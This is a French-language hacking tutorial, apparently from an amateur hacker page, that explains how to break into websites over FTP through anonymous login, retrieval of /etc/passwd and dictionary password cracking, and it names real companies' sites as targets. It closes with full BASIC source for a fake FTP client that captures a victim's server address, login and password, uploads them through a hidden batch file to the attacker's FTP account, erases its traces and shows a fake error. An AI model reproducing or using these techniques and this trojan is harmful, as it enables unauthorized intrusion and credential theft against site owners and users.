Hacker un site par FTP
1)Technique de hack par ftp
Ce hack est très simple mais il a un inconvénient : il marche de moins en moins...
Les serveurs sont de plus en plus protégés mais il y en a toujours pas mal, et j'essayerai de
vous filer quelques adresses de sites que l'ont peut hacker de cette manière.
Mais avant tout on va voir la technique : Ce hack s'effectue sous ftp.
Pour ouvrir ftp, cliquez sur Démarrer=>Executer=>ftp -n Une fenêtre ressemblant beaucoup
au DOS va s'ouvrir.
En bleu c'est ce qu'il faut taper, en orange ce que le serveur répond et en jaune mes commentaires
ftp>open url_du_site (ex : ftp>openwww.aol.com)
Connected to www.aol.com Web server Microsoft FTP Service (v.4.0)
Ce qui est écrit ici dépend du système d'exploitation du serveur ; ce n'est pas important ici,
mais sa pourra vous servir dans d'autres techniques de hack.
ftp>quote user ftp
331 Anonymous access allowed, send identify (e-mail) as password
ftp>quote cwd ~root
530 Please loggin with USER and PASS
ftp>quote pass ftp 230
Anonymous user logged in
Voilà vous êtes root ou tout au pire user sur la bécane, pour devenir root, vous devez trouver le
répertoire /etc et décrypter les passwords. Alors vous prenez VrackFTP Attention il faut être
patient et avoir du temps.
- dans host vous mettes l'url du site par exemple pour www.ifrance.com/WhitePower
(site hacké par ravenshadow)
- dans user nous mettez WhitePower
- vous laissez le port 21 et dans passwords vous sélectionnez un dictionnaire (attention avec VrackFTp
il n'y a pas de dico donc vous en cherchez un.
- Puis vous le laissez faire il trouve tout seul IMPORTANT!! :
Une fois que vous êtes connecté ce sont les commandes FTP qui s'appliquent.
Attention cette technique ne marche pas sur tout les serveurs donc ne vous étonnez pas
qu'il vous marque un message d'erreur
2)Encore un autre technique de hack par ftp
exemple sur www.francetelecom.com
(c'est un exemple :-) bon alors tu tapes :
www.francetelecom.com/stats
Si cela marche c'est que le serveur n'est pas bien protégé ou que l'accès est restreint autre
vérification tu tapes
ftp://ftp.francetelecom.com
Si tu as un accès c'est que c'est bon maintenant tu prends un client ftp du style WS_FTP .
Le programme te demande un login et un UserID, alors si tu as réussi à entrer par ftp tu
cherches /etc/passwd .
Autrement tu utilise WS_ping pro pack .
Tu trace le site avec cet outil et la pour notre exemple tu vois apparaître LAMER il y a de
grandes chances que le UserId soit aussi le même que le login donc LAMER pour notre
exemple, viola tu es sur le site et tu fais ce que tu veux laisse tes traces mais n'efface pas de
fichier et n'oublies pas de laisser une petite trace pour les autres.
Encore autre chose Cette technique demande très peu de connaissances.
Elle s'adresse plutôt aux Newbies.
Pour qu'elle marche, elle demande que l'utilisateur en face ne soit pas trop prudent.
Voici comment nous allons procéder :
Nous voulons obtenir le Login et le Password d'un compte FTP. Pour cela, nous allons bricoler
un logiciel FTP bidon.
J'entends par logiciel FTP bidon : un logiciel ayant l'apparence d'un client FTP
(comme WS-FTP) mais qui n'en est pas un.
Il nous faudra également un compte FTP nous appartenant.
(Chez Mygale ça devrais faire l'affaire).
Donc, notre logiciel FTP bidon demandera, (comme tout logiciel client FTP)
à l'utilisateur le nom du serveur sur lequel est son compte, son Login et son Password. Ensuite,
il enregistrera ces infos dans un fichier.
Une fois les infos enregistrées, le programme devra les envoyer directement dans notre compte.
Et voilà ! A présent, Il nous suffit d'aller relever dans notre compte les fichiers qui contiennent
les accès à l'aide cette fois d'un vrai client FTP.
L'exemple suivant est utilisé pour un compte FTP mais vous pouvez adapter cette technique pour
tout autre type de comptes en modifiant simplement l'aspect extérieur du programme.
Voici le code source du programme en Basic.
CODE SOURCE EN BASIC :
rem [Générateur Aléatoire]
Randomize Timer
rem [Infos sur le compte FTP]
cls
input "Veuillez rentrer l'adresse de votre serveur FTP "; A$
input "Veuillez rentrer votre Login "; N$
input "Veuillez rentrer votre Password "; P$
rem [Création d'un nom aléatoire de fichier pour le téléchargement sur votre compte]
For X = 1 To 5
F$ = F$ + Chr$(65 + Int(Rnd * 26))
Next rem [CrÚation d'un nom alÚatoire de fichier pour les commandes FTP]
For X = 1 To 5
G$ = G$ + Chr$(65 + Int(Rnd * 26))
Next
rem [Création d'un nom aléatoire pour le fichier Batch (*.bat) qui executera les commandes]
For X = 1 To 5
B$ = B$ + Chr$(65 + Int(Rnd * 26))
Next
rem [Enregistrement des infos du compte dans un fichier]
Open "C:" + F$ For Output As #1
Print #1, A$
Print #1, N$
Print #1, P$
Close #1
cls
print "Connect to " + A$
rem [Enregistrement des commandes FTP]
Open "C:" + G$ For Output As #1
Print #1, "open www.exemple.com"
Print #1, "quote user code-bar"
Print #1, "quote pass h5fila45"
Print #1, "put C:" + F$ + " x" + F$
Print #1, "close"
Close #1
rem [Enregistrement des commandes dans le fichier batch]
Open "C:windows" + B$ + ".bat" For Output As #1
Print #1, "@echo off"
Print #1, "C:windowsftp -v -n -s:C:" + G$
Print #1, "cls"
Print #1, "del C:" + F$
Print #1, "del C:" + G$
Print #1, "cls" Close #1
rem [Démarrage du fichier de commandes (Batch)]
Shell "C:windows" + B$ + ".bat"
Shell "del C:windows" + B$ + ".bat"
rem [Fin de la procédure et erreur simulée] cls
Print "Error (520) FTP Connexion failed" boucle: goto boucle
Je vais vous apprendre la méthode pour cracker le pass d'un site par brute
force ........... et patience et surtout temps !
